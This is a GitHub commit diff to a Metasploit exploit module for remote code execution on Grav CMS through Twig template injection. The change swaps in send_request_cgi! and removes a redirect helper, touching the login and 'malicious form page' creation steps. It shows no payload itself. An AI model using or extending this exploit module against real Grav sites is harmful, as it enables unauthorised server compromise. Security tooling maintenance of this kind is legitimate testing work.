Skip to content

Commit a20e2df

Browse files
nakkouchtareknakkouchtarek
committed
Use send_request_cgi! for automatic redirect handling
1 parent 028aa2f commit a20e2df

File tree

1 file changed

+2
-16
lines changed

1 file changed

+2
-16
lines changed

modules/exploits/multi/http/grav_twig_ssti_sandbox_bypass_rce.rb

Lines changed: 2 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -166,16 +166,13 @@ def get_version_after_login
166166
end
167167

168168
def authenticate
169-
res = send_request_cgi(
169+
res = send_request_cgi!(
170170
'method' => 'GET',
171171
'uri' => normalize_uri(target_uri.path, 'admin'),
172172
'keep_cookies' => true
173173
)
174174
return :connection_failed unless res
175175

176-
res = follow_redirect(res)
177-
return :connection_failed unless res
178-
179176
html = res.get_html_document
180177
return :connection_failed unless html
181178

@@ -237,7 +234,7 @@ def fetch_admin_nonce
237234

238235
def create_form_page
239236
print_status('Creating malicious form page...')
240-
res = send_request_cgi(
237+
res = send_request_cgi!(
241238
'method' => 'POST',
242239
'uri' => normalize_uri(target_uri.path, 'admin', 'pages'),
243240
'keep_cookies' => true,
@@ -254,7 +251,6 @@ def create_form_page
254251
)
255252
fail_with(Failure::Unreachable, 'Connection failed') unless res
256253

257-
res = follow_redirect(res)
258254
html = res.get_html_document
259255
fail_with(Failure::UnexpectedReply, 'Could not parse form page') unless html
260256

@@ -370,14 +366,4 @@ def compress_deflate(data)
370366
deflater.close
371367
compressed
372368
end
373-
374-
def follow_redirect(res)
375-
return res unless [301, 302, 303].include?(res.code)
376-
377-
send_request_cgi(
378-
'method' => 'GET',
379-
'uri' => res.headers['Location'],
380-
'keep_cookies' => true
381-
)
382-
end
383369
end

0 commit comments

Comments
 (0)